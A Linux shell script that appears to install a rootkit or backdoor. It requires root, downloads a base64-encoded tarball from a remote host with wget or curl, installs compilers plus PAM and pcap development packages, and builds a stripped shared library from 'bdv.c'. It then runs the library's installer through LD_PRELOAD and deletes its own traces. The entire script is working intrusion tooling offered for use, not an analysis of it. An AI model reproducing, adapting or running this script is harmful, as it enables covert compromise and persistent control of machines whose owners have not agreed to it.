#!/bin/sh
[ -z "$1" ]&&B64L='http://host/your.b64'
[ ! -z "$1" ]&&B64L="$1"
WDIR='/tmp'
LF='-lc -ldl -lcrypt -lpcap'
WF='-Wall -Wno-unused-result'
OF='-Os -g0'
OPS='-fomit-frame-pointer -fPIC'
LO='-Wl,--build-id=none'
[ `id -u` != 0 ]&&exit;[ ! -e /proc ]&&exit;[ -d /proc/xen ]&&echo "Xen!";[ -d /proc/vz ]&&echo "OpenVZ!";[ -f /usr/bin/lveps ]&&echo "CloudLinux LVE!";bp(){ echo -n `which $1 2>/dev/null||echo -n 'v'`; };[ ! -f `bp base64` ]&&{ echo 'No base64';exit; };[ ! -f `bp tar` ]&&{ echo 'No tar';exit; };dl(){ if test "$DLR" = "wget";then DLC="$DLR -q $1 -O $2";fi;if test "$DLR" = "curl";then DLC="$DLR -s $1 -o $2";fi;$DLC||{ echo 'Fail download';rm -f $2;exit; }; };_L="`printf "$B64L"|sed -e 's/^\(.\{4\}\).*/\1/'`";if test "$_L" = "http";then [ -f `bp wget` ]&&DLR='wget';[ -f `bp curl` ]&&DLR='curl';[ -z $DLR ]&&{ echo 'No wget/curl';exit; };fi;[ ! -z "$1" ]&&mv "$1" $WDIR/;cd $WDIR;B64N="$WDIR/`basename $B64L`";if test "$_L" = "http";then echo "Fetching target";dl $B64L $B64N;fi;TN="${B64N}.tar.gz";cat $B64N|base64 -d>$TN||{ echo "Failed b64";rm -f $B64N $TN;exit; };[ ! -f $TN ]&&{ echo "Target missing";rm -f $B64N;exit; };ID="`tar tzf $TN|head -1|cut -f1 -d"/"`";tar xpfzm $TN>/dev/null;rm -f $TN $B64N;[ ! -d "$ID" ]&&{ echo "Target missing";rm -f $TN $B64N;exit; };echo 'Installing';[ -f /usr/bin/yum ]&&{ for pkg in gcc libgcc.i686 glibc-devel.i686 glibc-devel pam-devel libpcap libpcap.i686 libpcap-devel libpcap-devel.i686;do yum -y install -e 0 $pkg;done; };[ -f /usr/bin/pacman ]&&{ pacman -Syy;for pkg in glibc base-devel pam libpcap;do pacman -S $pkg;done; };[ -f /usr/bin/apt-get ]&&{ if test "`uname -m|sed -e 's/^\(.\{4\}\).*/\1/'`"!="armv";then dpkg --add-architecture i386;fi;apt-get -qq --yes --force-yes update;for pkg in gcc-multilib build-essential libpam0g-dev libpcap-dev libpcap0.8-dev;do apt-get -qq --yes --force-yes install $pkg;done; };PF="`uname -m`";_PF="`printf $PF|sed -e 's/^\(.\{4\}\).*/\1/'`";if test "$_PF" = "armv";then PF="`printf $PF|sed 's/.*\(...\)/\1/'`";fi;gcc -std=gnu99 $OF $ID/bdv.c $WF $OPS -I$ID -shared $LF $LO -o $ID/b.so.$PF;gcc -m32 -std=gnu99 $OF $ID/bdv.c $WF $OPS -I$ID -shared $LF $LO -o $ID/b.so.i686 2>/dev/null;strip $ID/b.so*||{ echo "Fail strip";rm -rf $ID;exit; };LD_PRELOAD=$ID/b.so.$PF sh -c "./bdvinstall $ID/b.so*";rm -rf $ID;exit;
